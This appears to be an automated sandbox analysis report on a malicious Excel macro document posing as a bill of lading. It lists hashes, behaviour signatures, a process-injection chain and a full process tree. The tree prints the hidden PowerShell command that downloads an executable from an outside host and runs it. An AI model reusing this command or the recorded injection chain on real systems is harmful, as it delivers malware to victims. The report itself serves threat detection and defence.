Analysis
-
max time kernel
146s -
max time network
136s -
platform
windows7_x64 -
resource
win7 -
submitted
30-06-2020 06:47
Static task
static1
Behavioral task
behavioral1
Sample
Scan Bill of Lading.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
Scan Bill of Lading.xlsm
Resource
win10v200430
General
-
Target
Scan Bill of Lading.xlsm
-
Size
398KB
-
MD5
937aa5650aa985dd443f4a03156967c9
-
SHA1
f40cd6481a66c1608a6b97580fe69f2e4904ed6d
-
SHA256
f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331
-
SHA512
8113094f933fbd159ec1d37bd7da487e42a515bfba57c6de6c82358223b2e202c6b592ea8fff18568694ca58fdbaebfb60b53f7974743a8c8c9f4abc1af68b93
Malware Config
Extracted
https://kyivremont.com/vbc.exe
Signatures
-
Processes:
Explorer.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1612 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
AddInProcess32.exewuapp.exepid process 1760 AddInProcess32.exe 1760 AddInProcess32.exe 1760 AddInProcess32.exe 1760 AddInProcess32.exe 1564 wuapp.exe 1564 wuapp.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Explorer.EXEpid process 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
EXCEL.EXEpowershell.exeputty.exeExplorer.EXEwuapp.exedescription pid process target process PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe PID 1612 wrote to memory of 1804 1612 EXCEL.EXE powershell.exe PID 1804 wrote to memory of 1964 1804 powershell.exe putty.exe PID 1804 wrote to memory of 1964 1804 powershell.exe putty.exe PID 1804 wrote to memory of 1964 1804 powershell.exe putty.exe PID 1804 wrote to memory of 1964 1804 powershell.exe putty.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1964 wrote to memory of 1760 1964 putty.exe AddInProcess32.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1256 wrote to memory of 1564 1256 Explorer.EXE wuapp.exe PID 1564 wrote to memory of 1128 1564 wuapp.exe cmd.exe PID 1564 wrote to memory of 1128 1564 wuapp.exe cmd.exe PID 1564 wrote to memory of 1128 1564 wuapp.exe cmd.exe PID 1564 wrote to memory of 1128 1564 wuapp.exe cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeputty.exeAddInProcess32.exewuapp.exedescription pid process Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1964 putty.exe Token: SeDebugPrivilege 1760 AddInProcess32.exe Token: SeDebugPrivilege 1564 wuapp.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.exeputty.exeAddInProcess32.exewuapp.exepid process 1804 powershell.exe 1964 putty.exe 1964 putty.exe 1964 putty.exe 1760 AddInProcess32.exe 1760 AddInProcess32.exe 1760 AddInProcess32.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe 1564 wuapp.exe -
Loads dropped DLL 1 IoCs
Processes:
putty.exepid process 1964 putty.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1804 1612 powershell.exe EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1804 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
putty.exeAddInProcess32.exewuapp.exedescription pid process target process PID 1964 set thread context of 1760 1964 putty.exe AddInProcess32.exe PID 1760 set thread context of 1256 1760 AddInProcess32.exe Explorer.EXE PID 1760 set thread context of 1256 1760 AddInProcess32.exe Explorer.EXE PID 1564 set thread context of 1256 1564 wuapp.exe Explorer.EXE -
Executes dropped EXE 2 IoCs
Processes:
putty.exeAddInProcess32.exepid process 1964 putty.exe 1760 AddInProcess32.exe -
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Scan Bill of Lading.xlsm"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://kyivremont.com/vbc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')3⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Blacklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"5⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Executes dropped EXE
-
C:\Windows\SysWOW64\wuapp.exe"C:\Windows\SysWOW64\wuapp.exe"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
-
memory/1128-22-0x0000000000000000-mapping.dmp
-
memory/1256-18-0x0000000006C90000-0x0000000006D7B000-memory.dmpFilesize
940KB
-
memory/1564-23-0x0000000001E40000-0x0000000001EE4000-memory.dmpFilesize
656KB
-
memory/1564-20-0x00000000008A0000-0x00000000008AB000-memory.dmpFilesize
44KB
-
memory/1564-19-0x0000000000000000-mapping.dmp
-
memory/1612-6-0x0000000006AE0000-0x0000000006BE0000-memory.dmpFilesize
1024KB
-
memory/1612-0-0x0000000001D40000-0x0000000001D41000-memory.dmpFilesize
4KB
-
memory/1612-5-0x0000000006AE0000-0x0000000006BE0000-memory.dmpFilesize
1024KB
-
memory/1612-4-0x0000000006AE0000-0x0000000006BE0000-memory.dmpFilesize
1024KB
-
memory/1612-3-0x00000000004FA000-0x00000000004FC000-memory.dmpFilesize
8KB
-
memory/1612-2-0x0000000001D40000-0x0000000001D41000-memory.dmpFilesize
4KB
-
memory/1760-15-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/1760-16-0x000000000041E320-mapping.dmp
-
memory/1804-7-0x0000000000000000-mapping.dmp
-
memory/1964-12-0x0000000000000000-0x0000000000000000-disk.dmp
-
memory/1964-8-0x0000000000000000-mapping.dmp